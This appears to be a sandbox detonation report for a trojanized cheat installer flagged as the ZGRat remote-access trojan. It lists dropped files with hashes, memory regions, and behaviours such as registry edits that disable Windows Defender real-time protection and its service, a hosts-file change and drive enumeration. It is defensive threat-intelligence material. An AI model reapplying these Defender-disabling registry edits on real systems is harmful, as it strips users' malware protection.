SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe

MD5 a2593aaafbc721002841511838d11087
SHA1 15e041d1dd9ce13246c13d67fbc1421a3b958910
SHA256 a0897bbcfea525de7fc34aacfff95ec96225e8065071d390025e83c672ea7175
SHA512 e5c62fe32b292032544c77793b92bea547172b3850d994c113737a70a5075c93a0e4c96e2fd108bb89d6c6d50f36c08d79ef75fef170dd5304349d005c97f9c1

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe

MD5 4c4a5ff75aa08cde3dc99fe5572ae403
SHA1 0c9c0082f0bac9c0626e22c4dbfa02257d488ccf
SHA256 508ca93ea308645e7b90b69e2561429dad04ea107b66c4a5b0f2a43f17514668
SHA512 419c601f93d500986249681385cbc7032f1f67fda59efa0bb6bdd6ec43bc8970bf64520871433dc32221fcce12c4f179a57844f34f2e95bd7e2a1ed324eb0772

\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe

MD5 c162bceb13fbfe8b1002f78d594860a2
SHA1 891c5206c24d828659e5101b7a79d2fba75d2f0a
SHA256 7a46ec0725be1cbbc3fd54e1677e874c7ccbb68833c0bd63ea9f8a249d6cb201
SHA512 4e9d2442eb860ef92144a0c9659be2fb484b8db2b6f6695c6549cb6a2ce68186848f29103d34bf7af172cadd41b8f2f121999ae409ae919ba04c124346dfbb6f

\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe

MD5 50e74d7abd1b9dbd853f0224e10bc77f
SHA1 46216b76038734d6ca11a5e6da327b2a3c6ed990
SHA256 794a65443bfc3a7bb5f2d8b88705f1ecae38c97c9377190bafa4e39eb323871f
SHA512 52755635e4acdd95e40a1d948cb951a5ee35bf6a93ddf79075294a41162c0c5c8c026b096f694ce7da743af0503a22993dd4c3e69c9c806939bd436f0de684f5

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\Install_YTTCHTs.exe

MD5 810591f8022b47c739c240fa1d29711a
SHA1 fd10d77523fff7e9aa543ecbf82383d3fd530cbb
SHA256 19f237a1dd7a7faf38d3ed014bf59ae88ceb2136600e21aa36356225d2074d19
SHA512 506e673613fe8688a53b795ff7b87a80ffe5c560b3a383e11e84c118180fd8e48fb745e564ed66d24202b55aacc56fa4accfc050941ba4d22eb4f30747fcda45

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 5f0c3e0e1afc344533d1c7b7cd36c8c6
SHA1 80c24021da68b25e08c66f88505434533c4e9cf3
SHA256 5cfb68c4ae3e312a9a32b62fbfdc4759bcd6989b189dee2223125a49b8621c46
SHA512 77fbcf288abd89bfb4e773ae14989aba8ad3b396c77b5c650a269b80a4b9d9f192eb9e03953279837263704731bbd709f0e5ecad88563632593504327b6275c4

C:\Users\Admin\AppData\Local\Temp\CabB5E9.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarB60B.tmp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\MSIC369.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSIC5BA.tmp

MD5 0f3eb3aa7011de74ebb22ae4c76eeaea
SHA1 bba9206860dcddd91e49e496d88e95c56b53ccab
SHA256 bb0b016724adf72692cf362bc72f6fb94e41f7ec8d8177e495086be11c69aa5f
SHA512 7dd5a1013914f983a491f3ee17f0ea743acd16ef9bab99235ed88f6821506c5cbeede96e977d8c0cdaee96c2a8df89248718c8de7cf8670e4b99ef2b7a9933f5

\Users\Admin\AppData\Local\Temp\MSIC5BA.tmp

MD5 b52a7cfba0ec4ecd0066c275e265a2af
SHA1 d36524c5cc86bfd44ac1054fb314886fbf8c0b5d
SHA256 88d60c6fa88066bbf04e22a6f3c269614fdc8bb16b464226750717b0a052430e
SHA512 e730da718e59a118b264596d560a1021375d549c9ab5c20e7c488d1228c2e0672f1b131dc7eba6f51c58fb241493d2f70ac2ce39a7e46fd835e6cd83e1598d3c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 60a7d2c44365ab7d36996f92dd9f5023
SHA1 f12a460eb1e786825d8d52c89fec66ed08922bb6
SHA256 266abc1a81320d056800d16f909957ed54a5e2f4dde5b875d17a69000c3d98eb
SHA512 7cfd77888b770a65aa562c982384eb19d5e444cd31779479aea240f13728f2ab5ed4af40cd169a9afc3732d7f16b658859bf677126c917b747b6d32ded06cc18

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38fad79f2b3fc04dabcd8f0bb8b3b98a
SHA1 c48cfe4cd58229d52259b10c07a74d95601a56f5
SHA256 8b3f9f4b99c90c19a2d055cce498bb3b37c6c8b1b93520ce79c7c48e7646419c
SHA512 f59b545c5b7e094c006c968dbf8ff83aaa6072912d59dbabfedbf939ca4fe0be9c579bb413c3a0b4bd4f20ca4798018adaaa1543fac854d8685e9307153e6062

C:\Users\Admin\AppData\Local\Temp\TarC91C.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Windows\Installer\MSID214.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Windows\Installer\MSID35D.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

memory/748-3625-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/748-3627-0x0000000002A30000-0x0000000002AB0000-memory.dmp

memory/748-3626-0x0000000002290000-0x0000000002298000-memory.dmp

memory/748-3628-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/748-3624-0x000000001B370000-0x000000001B652000-memory.dmp

memory/748-3629-0x0000000002A30000-0x0000000002AB0000-memory.dmp

memory/748-3630-0x0000000002A30000-0x0000000002AB0000-memory.dmp

memory/748-3631-0x0000000002A30000-0x0000000002AB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scrD4AE.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\scrD4AF.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\pssD4C0.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 3862466e840708e60ed8cfe841f7a961
SHA1 cba9f1024d5f560a2f150cfbbdf1c7dd32f50286
SHA256 5685c6ffcea4fd4667070ac79ef1453e2addf6a9a2633a755c41a0ebbbcc5f54
SHA512 74e9da794aa51cf9ecc0aff391b6ea15a259384ecd3ed7e5c101d53bc4f7460cd92c5d1f20dda2ebec842c168f9b04a4e33e1fe1453d9aef8220f6a0c7240aed

memory/748-3696-0x0000000002A30000-0x0000000002AB0000-memory.dmp

memory/748-3697-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS7687.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-18 19:24

Reported

2024-03-18 20:24

Platform

win10-20240221-en

Max time kernel

1620s

Max time network

1808s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

ZGRat

rat zgrat

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Stops running service(s)

evasion

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
